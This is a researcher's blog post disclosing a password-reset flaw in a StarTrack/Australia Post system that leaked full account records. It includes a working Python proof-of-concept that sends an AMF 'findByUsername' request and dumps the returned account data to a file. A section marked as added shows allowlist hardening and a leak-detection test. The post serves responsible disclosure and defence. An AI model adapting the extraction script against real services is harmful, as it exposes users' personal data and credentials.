Australia Post Group – Sensitive Information Leakage

in Python, Security, Web application security

I recently discovered a severe vulnerability present in a key system owned by StarTrack. What was particularly unusual about this vulnerability was that it didn’t require any sort of unusual payload to exploit – account data was being leaked within the normal processes of the system.

Specifically, merely requesting a password reset from the login page was enough to cause the application to respond with a complete dump of the account information. This information included:

  • Account holder contact information
  • Internal account manager contact information
  • Account permissions
  • Password reset question and answer
  • Password (salted & hashed)

Since the vulnerable system was Flash-based, its calls used a format I had not had much previous experience with: Action Message Format (AMF), a binary serialisation format used widely by web applications with Adobe Flash components. The request and response are similar in structure to a SOAP API call, but the payload is almost entirely binary, which made it a little more difficult to explain in the report how to reproduce the issue.

I ended up writing a small Python script which would prompt for the account username, encode the data and send it off in AMF format, then take the response data, decode it to ASCII, then write that to a dump file. See below:


import uuid

import pyamf
from pyamf import remoting
from pyamf.flex import messaging
import requests


# Author's banner, printed when the script starts
def border_msg(msg):
    row = len(msg)
    h = '+' + '-' * row + '+'
    result = h + '\n|' + msg + '|\n' + h
    print(result)


border_msg("\nCopyright 2018, Daniel Wallace | daniel@danielwallace.com.au\nThis code serves as a proof-of-concept for the StarTrack ***** system data leakage vulnerability, and may only be used for the purpose of vulnerability assessment.\n")

account = input("Please enter username:")

# UUID doesn't really matter, can be any string. Included a random valid UUID though for good measure
msg = messaging.RemotingMessage(operation='findByUsername',
                                destination='accountManager',
                                messageId=str(uuid.uuid4()).upper(),
                                body=[account])
req = remoting.Request(target='null', body=[msg])
ev = remoting.Envelope(pyamf.AMF3)
ev['/2'] = req

# Encode request
bin_msg = remoting.encode(ev)

# Send request
resp = requests.post('redactedurl',
                     data=bin_msg.getvalue(),
                     headers={'Content-Type': 'application/x-amf'})

# Decode response
resp_msg = remoting.decode(resp.content)
print(resp_msg.bodies)

# Dump the decoded response bodies to <username>.txt
# (a single open in write mode; the earlier exclusive-create open was redundant
# and failed on a second run for the same account)
with open(account + ".txt", "w") as f:
    for item in resp_msg:
        f.write(str(item))
print("Wrote account details to " + account + ".txt")

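The root cause of this class of bug sits on the server: the account lookup behind the password-reset flow serialised the entire account object into the response, so every field, including the hashed password and the reset question and answer, went back to an unauthenticated caller. The fix is to build such responses from an explicit allowlist of fields and to test that nothing sensitive can appear in them. The block below is an added example and not code from the original post, from StarTrack or from Australia Post; the `Account` layout, field names, `reset_response_*` functions and sample values are constructed to mirror the five categories of leaked data listed above.

```python
"""Added example (not from the original post): allowlist-based response
building for a password-reset endpoint, plus a guard that reports any
sensitive field that slips into a response. The Account record below is a
constructed stand-in, not the real StarTrack schema."""
from dataclasses import dataclass, asdict, field
import secrets


@dataclass
class Account:
    """Constructed account record mirroring the data categories the post lists."""
    username: str
    contact_email: str                  # account holder contact information
    account_manager_email: str          # internal account manager contact information
    permissions: list = field(default_factory=list)
    reset_question: str = ""            # password reset question ...
    reset_answer_hash: str = ""         # ... and (hashed) answer
    password_hash: str = ""             # salted & hashed password
    salt: str = ""


# Fields that must never appear in a client-facing response of this flow.
SENSITIVE_FIELDS = frozenset({
    "contact_email", "account_manager_email", "permissions",
    "reset_question", "reset_answer_hash", "password_hash", "salt",
})

# Allowlist: the only account fields the reset flow needs to echo back.
RESET_RESPONSE_FIELDS = ("username",)

# Server-side store for issued reset tokens (in-memory stand-in for a database).
_RESET_TOKENS = {}


def reset_response_leaky(acct: Account) -> dict:
    """'Before': serialise the whole object, which is the bug the post describes."""
    return {"status": "ok", "account": asdict(acct)}


def reset_response_hardened(acct: Account) -> dict:
    """'After': copy only allowlisted fields, so fields added later stay hidden
    by default. The reset token is generated server-side and delivered out of
    band (e.g. by e-mail), so it is deliberately not part of the response."""
    _RESET_TOKENS[acct.username] = secrets.token_urlsafe(32)
    public = {k: v for k, v in asdict(acct).items() if k in RESET_RESPONSE_FIELDS}
    return {"status": "reset_email_sent", "account": public}


def find_leaked_fields(response) -> list:
    """Walk a decoded response (nested dicts/lists) and return the sorted list
    of sensitive keys found. Usable as a unit test on serialisers or as a
    last-line response filter in front of the wire encoder."""
    leaked = set()

    def walk(obj):
        if isinstance(obj, dict):
            for key, value in obj.items():
                if key in SENSITIVE_FIELDS:
                    leaked.add(key)
                walk(value)
        elif isinstance(obj, (list, tuple)):
            for value in obj:
                walk(value)

    walk(response)
    return sorted(leaked)


# Constructed sample account; every value is a placeholder.
SAMPLE = Account(
    username="example.customer",
    contact_email="customer@example.invalid",
    account_manager_email="manager@example.invalid",
    permissions=["consignments:read", "consignments:create"],
    reset_question="First pet's name?",
    reset_answer_hash="<constructed-hash>",
    password_hash="<constructed-hash>",
    salt="<constructed-salt>",
)

if __name__ == "__main__":
    print("leaky    ->", find_leaked_fields(reset_response_leaky(SAMPLE)))
    print("hardened ->", find_leaked_fields(reset_response_hardened(SAMPLE)))
```

Running the block shows the leaky serialiser exposing all seven sensitive fields and the hardened one exposing none; wiring `find_leaked_fields` into the test suite (or into the response pipeline, failing closed) is what stops a future "just dump the object" change from reintroducing the same leak.
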
Once this script was complete, I sent off the full report to Australia Post Group, as per their Responsible Disclosure Policy. They took a day or so to verify the issue – which is fair, seeing as the script had a few dependencies – then the affected endpoint was promptly taken offline.

Their security team were a pleasure to work with and have been considerate enough to keep me informed throughout the entire process as they investigate and analyse the impact.

The company has since initiated a full investigation into the affected system. This investigation is ongoing.